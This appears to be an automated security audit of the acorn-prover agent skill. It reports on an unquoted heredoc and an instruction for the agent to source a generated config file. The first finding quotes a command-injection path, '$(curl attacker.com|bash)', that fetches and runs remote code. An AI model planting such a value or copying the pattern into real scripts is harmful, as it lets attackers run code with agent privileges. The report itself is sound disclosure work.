Is flyingnobita/acorn-prover safe?
https://github.com/openclaw/skills/tree/main/skills/flyingnobita/acorn-prover
The acorn-prover skill is a focused, legitimate Acorn theorem prover integration with no prompt injection, no canary violations, and no unexpected network activity. Its primary security weakness is a design pattern — using bash source on a config file generated from user-supplied shell arguments — that creates a code-execution risk if a user provides adversarially crafted filesystem paths or if config.env is tampered with post-installation. The skill content itself contains no malicious instructions.
Findings (6)
MEDIUM Unquoted heredoc in setup.sh expands user-supplied paths as shell code -15
setup.sh uses cat > "$CONFIG_FILE" <<EOF with an unquoted delimiter, causing bash to expand $ACORN_LIB and $ACORN_PROJECT inline before writing to config.env. If a user supplies a path containing command substitution syntax (e.g., /valid/path/$(curl attacker.com|bash)), the substitution executes at write time. The directory existence check ([[ ! -d "$ACORN_LIB" ]]) fires before the write but does not sanitize metacharacters.
MEDIUM SKILL.md instructs agent to `source` a config file — executes arbitrary shell code -15
Step 4 of the setup workflow instructs the agent to run source skills/acorn-prover/config.env. The source (.) builtin executes the file as shell commands in the current process. If config.env contains any shell syntax beyond simple variable assignments — whether from heredoc injection, path traversal, or external tampering — it will execute with full agent privileges. This is a persistent risk on every invocation that triggers reconfiguration.
LOW Source command imports config variables into agent shell environment -8
Sourcing config.env sets ACORN_LIB, ACORN_PROJECT, and USE_MISE in the agent's shell environment. A manipulated config.env could additionally set PATH, LD_PRELOAD, LD_LIBRARY_PATH, or other environment variables that affect subsequent command execution for the rest of the session.
LOW User-provided filesystem paths written to persistent config without sanitization -10
The ACORN_LIB and ACORN_PROJECT values come from user input, are validated only for directory existence, and are then written verbatim to a persistent file (config.env). This file persists across sessions and is sourced on every reconfiguration. There is no restriction on paths pointing to sensitive directories (e.g., /etc, ~/.ssh) which could be referenced by subsequent acorn commands.
LOW Installation requires live network access to GitHub -7
The install process clones from https://github.com/openclaw/skills.git using sparse-checkout to retrieve only the acorn-prover subtree. This is expected for this skill distribution model, but means the installed content is controlled by the GitHub repository state at install time and could differ from what was audited if the repo is updated between audit and installation.
INFO Canary file accesses attributable to Oathe audit infrastructure, not skill 0
Filesystem events show .env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, and gcloud credentials were opened at 04:39:35 (5 seconds before the git clone began at 04:39:40) and again at ~1771907994 (post-install teardown). Timing and audit event sequencing indicate these are Oathe baseline collection and integrity verification reads, not skill-originated accesses. All canary files remain intact.